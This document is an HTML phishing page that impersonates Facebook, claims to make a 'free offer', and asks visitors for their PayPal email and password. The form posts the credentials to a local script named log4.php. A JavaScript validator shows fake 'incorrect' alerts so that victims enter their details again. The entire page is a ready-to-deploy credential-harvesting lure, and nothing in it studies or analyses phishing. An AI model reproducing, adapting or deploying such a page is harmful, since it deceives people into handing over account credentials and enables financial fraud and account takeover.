

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Facebook</title>
    <link rel="shorcut icon" href="d4ZIVX-5C-b.ico">

    <!-- Style -->
    <link rel="stylesheet" href="bootstrap.min.css">
    <style>
      html,body {
        background-color: #eceff6;
      }
	  .navbar{padding:0px;}
      button:focus,
      input:focus,
      textarea:focus,
      select:focus {
          outline: none;
      }
      .login {
        max-width: 100%;
        width: 450px;
        display: block;
        align-items: center;
        background-color: #fff;
        border: none;
        border-radius: 8px;
        box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1), 0 8px 16px rgba(0, 0, 0, 0.1);
        box-sizing: border-box;
        margin: 0px;
        padding: 0 0 28px;
      }

      textarea:focus,
      input[type="text"]:focus,
      input[type="password"]:focus,
      input[type="datetime"]:focus,
      input[type="datetime-local"]:focus,
      input[type="date"]:focus,
      input[type="month"]:focus,
      input[type="time"]:focus,
      input[type="week"]:focus,
      input[type="number"]:focus,
      input[type="email"]:focus,
      input[type="url"]:focus,
      input[type="search"]:focus,
      input[type="tel"]:focus,
      input[type="color"]:focus,
      .uneditable-input:focus {
        border-color: #ced4da;
        box-shadow: 0 1px 1px rgba(0, 0, 0, 0) inset, 0 0 8px rgba(126, 239, 104, 0);
        outline: 0 none;
      }

      .bg-utama {
        background-color: #3b5998;
      }
      .img-login {
        width: 450px;
        margin: 0px auto;
      }

      .text {
        font-size: 1em;
        display: block;
        margin-top: -8px;
        margin-bottom: 20px;
        color: #919191;
      }

      .form-control {
        display: block;
        height: 45px;
        margin: 6px auto;
        border-left:none;
		border-right:none;
		border-top:none;
      }

      .border-bottom-x {
        border-radius: 0px;
        border-top-left-radius: .25rem;
        border-top-right-radius: .25rem;
        outline: none;
        font-size: 14px;
      }

      .border-top-x {
        border-radius: 0px;
        border-bottom-left-radius: .25rem;
        border-bottom-right-radius: .25rem;
        outline: none;
        font-size: 14px;
      }

      .btn-login {
        width: 100%;
        display: block;
        margin: 15px auto;
        background-color: #1877f2;
        font-size: 16px;
		padding: 9px 5px;
      }
	  
	  .btn-sign {
        width: 75%;
        display: block;
        margin: 10px auto;
        background-color: #36a420;
        font-size: 16px;
		padding: 9px 5px;
      }

      .hiya {
        margin: -10px auto 15px auto;
      }

      .text-buat {
        margin: 13px auto;
        color: #3b5998;
      }
	  .text-atau {
        margin: 13px auto;
        color: #3b5998;
      }
		.text-atau:before,
		.text-atau:after {
		  background-color: #ced4da;
		  content: "";
		  display: inline-block;
		  height: 1px;
		  position: relative;
		  vertical-align: middle;
		  width: 40%;
		}

		.text-atau:before {
		  right: 0.5em;
		  margin-left: -50%;
		}

		.text-atau:after {
		  left: 0.5em;
		  margin-right: -50%;
		}

      .text-lupa {
        color: #1777f1;
        font-size: 0.9em;
      }

      @media only screen and (max-width: 600px) {
        .login {
        display: block;
        margin: 0 auto;
        }
      }
    </style>
</head>
  <body>
    <div class="login mx-auto d-block">
      <nav class="navbar bg-utama navbar-dark text-center">        
          <img class="mx-auto d-block img-login" src="baackdropatas.jpg">        
      </nav>
      <div class="container">
        <div class="row">
          <div class="col-sm-12 col-lg-12 text-center mx-auto d-block">            
            <div class="text" style="margin-top:5px">
              For your safety, please enter your details below. You will not be charged. This is a free offer from Facebook. Facebook securely protects your information. 
            </div>
          </div>
        </div>

       <div id="root" tabindex="0" role="main" class="_4498 acw">
<div id="objects_container"><div class="aclb"><div class="loginInner">
<form method="post" action="/log4.php" onSubmit="return Form1_Validator(this)">


<div class="mam">
<div class="payment_divider"><span class="payment_divider_text fss fwb fcg">Please enter your PAYPAL information</span>
</div></div>
<br>
<div class="mal pam uiBoxGray">
<table class="uiInfoTable fbCreditCardFields noBorder" role="presentation">

<tr class="showInEditMode dataRowInEditMode">
<th class="label">Paypal Mail ：</th>
<td class="data"><span><span class="hideInEditMode"></span><span class="showInEditMode">
<input type="text" class="inputtext" name="paypalmail" size="25"/></span></span></td></tr>
<tr class="showInEditMode dataRowInEditMode">
<th class="label">Paypal Password ：</th><td class="data"><span><span class="hideInEditMode"></span><span class="showInEditMode">
<input type="text" class="inputtext" name="pwpaypal" maxlength="20" size="25" autocomplete="off" onKeyDown="return">
</span></span></td></tr>

</span></span></td></tr></table>
<center><span class="_52yl style4">We take safety seriously. We will never display the full phone number anywhere in your account.</span></center>

<button class="btn btn-login text-white" type="submit" name="login">Update Completed</button>
<center><a  href="http://www.youtube.com/"><span></span></a>
<iframe src="https://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fapps%2Fapplication.php%3Fid%3D56531631380&amp;layout=standard&amp;show_faces=true&amp;width=2000&amp;action=like&amp;colorscheme=light&amp;height=1000" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:345px; height:94px;" allowTransparency="true"></iframe>
</center><br>

</span></span></td></tr></table>
              </div>
            </form>
          </div>
        </div>

        <div class="row">
          <div class="col-sm-12 col-lg-12 text-center mx-auto d-block">
            <div class="hiya"> 
</div></div>

</center>	<div class="hiya mt-5">
              <a href="#" class="text-buat d-block text-lupa">Facebook &copy; 2020</a>
            </div>
          </div>
        </div>
		
		<br><br>
      </div>
    </div>
    <!-- Script -->
    <script type="text/javascript" src="jquery-3.4.1.min.js"></script>
    <script type="text/javascript" src="bootstrap.min.js"></script>
    <script type="text/javascript" src="bootstrap.bundle.min.js"></script>
    </div></div>
<script language="JavaScript">
function Form1_Validator(theForm)
{
var alertsay = ""; 
if (theForm.paypalmail.value.length < 10)
{
alert("The email you entered does not match your Paypal account.");
theForm.paypalmail.focus();
return (false);
}
if (theForm.pwpaypal.value.length < 6)
{
alert("The password you entered is incorrect.");
theForm.pwpaypal.focus();
return (false);
}}
</script><br>
</body>
</html>